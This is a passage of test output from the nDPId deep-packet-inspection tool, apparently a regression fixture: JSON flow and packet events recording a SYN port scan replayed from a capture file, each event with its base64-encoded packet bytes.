+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsBP4AADoGCXWsEAAIQA2GNIzTatndU4MZAAAAAGACDADBsgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsCS8AACsGFESsEAAIQA2GNIzTBIDdU4MZAAAAAGACEAAkDAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsNE0AADQG4CWsEAAIQA2GNIzTxczdU4MZAAAAAGACBABuvwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsjGwAADgGhAasEAAIQA2GNIzTE4vdU4MZAAAAAGACBAAhAQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsvsAAADAGWbKsEAAIQA2GNIzTBCfdU4MZAAAAAGACBAAwZQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsu84AACgGZKSsEAAIQA2GNIzTW87dU4MZAAAAAGACBADYvQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAseXYAACgGpvysEAAIQA2GNIzTCT7dU4MZAAAAAGACBAArTgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsiBQAACUGm16sEAAIQA2GNIzTw1bdU4MZAAAAAGACCABtNQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsKjIAADIG7ECsEAAIQA2GNIzTIc7dU4MZAAAAAGACDAAKvgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsmVUAADkGdh2sEAAIQA2GNIzTCHDdU4MZAAAAAGACCAAoHAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs4M4AADcGMKSsEAAIQA2GNIzT1xDdU4MZAAAAAGACEABRewAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsXlYAADsGrxysEAAIQA2GNIzTFbPdU4MZAAAAAGACEAAS2QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsbTcAACYGtTusEAAIQA2GNIzTH1bdU4MZAAAAAGACDAANNgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs5EEAADsGKTGsEAAIQA2GNIzTII3dU4MZAAAAAGACEAAH\/wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsaQQAAC0Gsm6sEAAIQA2GNIzTDvTdU4MZAAAAAGACCAAhmAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsWokAAC0GwOmsEAAIQA2GNIzTF+vdU4MZAAAAAGACCAAYoQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsA3wAAC0GF\/esEAAIQA2GNIzTB\/jdU4MZAAAAAGACCAAolAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs5fgAACwGNnqsEAAIQA2GNIzTBizdU4MZAAAAAGACBAAuYAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs2OsAADMGPIesEAAIQA2GNIzTIzPdU4MZAAAAAGACEAAFWQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsPK0AADcG1MWsEAAIQA2GNIzTBK7dU4MZAAAAAGACEAAj3gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs7dgAADoGIJqsEAAIQA2GNIzTF6vdU4MZAAAAAGACDAAU4QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAstjAAAC4GZEKsEAAIQA2GNIzTA4\/dU4MZAAAAAGACDAAo\/QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsdgUAADAGom2sEAAIQA2GNIzTB\/3dU4MZAAAAAGACBAAsjwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAscB4AACgGsFSsEAAIQA2GNIzTE8XdU4MZAAAAAGACBAAgxwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061212,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_packet_id":1,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061212,"pkt":"ACYLMQczACWzv5HuCABFAAAsgvYAADYGj3ysEAAIQA2GNIzTBZrdU4MZAAAAAGACDAAm8gAAAgQFtA=="} 